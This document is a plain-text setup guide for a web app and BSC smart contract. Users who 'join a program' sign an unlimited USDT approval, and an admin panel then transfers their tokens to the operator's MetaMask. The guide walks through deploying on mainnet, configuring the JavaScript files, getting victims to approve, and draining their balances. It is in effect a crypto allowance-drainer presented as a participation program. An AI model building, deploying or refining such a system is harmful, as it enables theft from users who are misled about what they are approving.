================================================================
   COMPLETE SETUP GUIDE - ADMIN CONTROLLED USDT TRANSFERS
================================================================

YOUR SYSTEM:
- Users connect Trust Wallet → Join Program → Approve USDT
- Admin sees all users in /admin panel
- Admin can transfer USDT from any user to your MetaMask

================================================================
STEP 1: DEPLOY PROGRAM CONTRACT IN REMIX
================================================================

1. Open Remix IDE: https://remix.ethereum.org/

2. Create new file: ProgramContract.sol

3. Copy code from: contracts/ProgramContract.sol

4. Compile:
   - Compiler: 0.8.0 or higher
   - Click "Compile ProgramContract.sol"

5. Deploy:
   - Environment: "Injected Provider - MetaMask"
   - Make sure MetaMask is on BSC MAINNET (Chain ID: 56)
   - Gas Limit: 3000000
   
   - Constructor Parameter:
     _usdtTokenAddress: 0x55d398326f99059fF775485246999027B3197955
   
   - Click "Deploy"
   - Confirm in MetaMask 
   
6. **Verify Contract on BSCScan**
   - Visit https://repo.sourcify.dev/56/0x8B9c85D168d82D6266d71b6f31bb48e3bE1caDf4 to see verified contract code
   - Verify your deployed contract on BSCScan for transparency

7. COPY THE DEPLOYED CONTRACT ADDRESS!
   Example: 0xABC123...DEF456

================================================================
STEP 2: UPDATE YOUR CODE
================================================================

1. Open: static/js/app.js
   - Line 73: Replace 'YOUR_PROGRAM_CONTRACT_ADDRESS_HERE'
     With: 0xABC123...DEF456 (your deployed address)

2. Open: static/js/admin.js  
   - Line 18: Replace 'YOUR_PROGRAM_CONTRACT_ADDRESS_HERE'
     With: 0xABC123...DEF456 (same address)

3. Save both files!

================================================================
STEP 3: RUN YOUR APPLICATION
================================================================

1. Open terminal/command prompt

2. Navigate to project folder

3. Run:
   python app.py

4. You'll see:
   * Running on http://0.0.0.0:5000

================================================================
STEP 4: TEST WITH TRUST WALLET (USER SIDE)
================================================================

1. On your phone, open Trust Wallet

2. In Trust Wallet, go to Browser/DApps

3. Enter: http://YOUR_COMPUTER_IP:5000
   (To find IP: run "ipconfig" on Windows, use the IPv4 address)

4. Click "Connect Wallet" on website

5. Approve connection in Trust Wallet

6. You should see:
   ✓ Connected wallet address
   ✓ BNB balance
   ✓ USDT balance

7. Click "Join Program" button

8. Trust Wallet will show 2 popups:
   Popup 1: Approve USDT (unlimited)
   - This lets the contract spend your USDT
   - Click "Confirm"
   
   Popup 2: Join Program transaction
   - This registers you as a participant
   - Click "Confirm"

9. Success! You'll see: "Successfully Joined!"

================================================================
STEP 5: ACCESS ADMIN PANEL
================================================================

1. On your computer, open browser

2. Go to: http://localhost:5000/admin

3. Click "Connect Admin Wallet"

4. Connect with the SAME MetaMask wallet you used to deploy contract

5. MetaMask will confirm you're the admin

6. Click "Load Participants"

7. You'll see:
   ✓ Total Participants: 1 (your Trust Wallet)
   ✓ Total USDT Balance: XX.XX USDT
   ✓ Table showing:
     - Wallet address
     - USDT balance
     - Allowance (Unlimited)
     - Transfer button

================================================================
STEP 6: TRANSFER FROM USER TO YOUR METAMASK
================================================================

1. In admin panel, find the user in the table

2. Click "Transfer" button

3. Modal popup shows:
   - From: User's address (Trust Wallet)
   - Balance: Their USDT amount
   - To: Your MetaMask address (pre-filled)
   - Amount: Enter amount you want to transfer

4. Enter amount (e.g., 10 USDT)

5. Click "Confirm Transfer"

6. Approve in MetaMask

7. Wait 5-10 seconds

8. Success! USDT transferred from user's Trust Wallet to your MetaMask!

9. Check your MetaMask:
   - Switch to BSC Mainnet
   - Add USDT token if not visible
   - You should see the transferred USDT!

================================================================
CHECKLIST BEFORE TESTING
================================================================

✓ ProgramContract deployed on BSC Mainnet
✓ Contract address updated in app.js (line 73)
✓ Contract address updated in admin.js (line 18)
✓ Flask app running (python app.py)
✓ Trust Wallet has USDT (BEP20) and BNB
✓ MetaMask on BSC Mainnet
✓ MetaMask is the wallet that deployed the contract

================================================================
IMPORTANT SECURITY NOTES
================================================================

⚠️ This gives you FULL CONTROL over users' USDT!
⚠️ Users must trust you completely
⚠️ Only use on BSC Mainnet with understanding of risks
⚠️ Test with small amounts first!
⚠️ Make sure users understand they're giving you access

================================================================
TROUBLESHOOTING
================================================================

Problem: "Contract Not Deployed" message
Solution: Update PROGRAM_CONTRACT_ADDRESS in both JS files

Problem: "You are not the contract admin"
Solution: Connect with same MetaMask wallet that deployed contract

Problem: "Insufficient allowance"
Solution: User needs to click "Join Program" first

Problem: Can't see USDT in MetaMask
Solution: Import token: 0x55d398326f99059fF775485246999027B3197955

================================================================
WHAT EACH FILE DOES
================================================================

ProgramContract.sol:
- Stores list of participants
- Allows admin to transfer from any participant
- Tracks approvals and balances

index.html:
- User interface for joining program
- Shows balance and status

admin.html:
- Admin dashboard
- Shows all participants
- Transfer controls

app.js:
- Handles user wallet connection
- Join program functionality

admin.js:
- Admin wallet connection
- Load participants
- Execute transfers

================================================================

📊 USDT Amount Reference:
USDT Amount	Value to Enter in Remix
0.01 USDT	10000000000000000 (1 + 16 zeros)
0.1 USDT	100000000000000000 (1 + 17 zeros) ✅
0.8 USDT	800000000000000000 (8 + 17 zeros) ✅
1 USDT	1000000000000000000 (1 + 18 zeros)
10 USDT	10000000000000000000 (10 + 18 zeros)

================================================================
ENHANCED CONTRACT - ProgramContractEnhanced
================================================================

For the enhanced contract with better security:

Constructor Parameters (BSC Deploy):
- _usdtToken: 0x55d398326f99059fF775485246999027B3197955
- _owner: YOUR_WALLET_ADDRESS

Enhanced Features:
- ✅ ReentrancyGuard protection
- ✅ SafeERC20 token transfers
- ✅ Emergency withdraw function
- ✅ Contribution tracking
- ✅ Min contribution: 1 USDT (adjustable)
- ✅ Program on/off switch
- ✅ Better admin controls

================================================================
HOW TO RECONNECT TO DEPLOYED CONTRACT
================================================================

After deployment, if you close Remix:

Method 1 - Using BSCScan:
1. Go to: https://bscscan.com/address/YOUR_CONTRACT_ADDRESS
2. Click "Contract" tab
3. Click "Write Contract"
4. Click "Connect to Web3"
5. Connect MetaMask/Trust Wallet

Method 2 - Using Remix:
1. Open Remix IDE: https://remix.ethereum.org/
2. Go to "Deploy & Run Transactions"
3. In "At Address" field: Enter your contract address
4. Click "At Address" button
5. Contract loads with all functions

Method 3 - Save Contract Info:
Create deployment.txt file:
```
Contract Address: [YOUR_ADDRESS]
BSCScan: https://bscscan.com/address/[YOUR_ADDRESS]
Network: BNB Smart Chain
Date: [TODAY]
Owner: [YOUR_WALLET]
```

================================================================
PENDING TRANSACTIONS TROUBLESHOOTING
================================================================

If transactions show "pending":

1. Check BSC Network Status:
   - Go to: https://status.bscscan.com/
   - If congested, wait 10-15 minutes

2. Increase Gas Settings:
   - Gas Price: Add 10-20% to current
   - Gas Limit: 3,000,000 (if too low)

3. Check Transaction:
   - Go to: https://bscscan.com/
   - Enter your wallet address
   - See pending transactions

4. If Stuck:
   - Wait 5-10 minutes first
   - Don't spam with new transactions
   - Transactions usually confirm within 5 minutes

Common Causes:
- BSC network congestion
- Gas price too low
- Node connectivity issues
- Wallet sync problems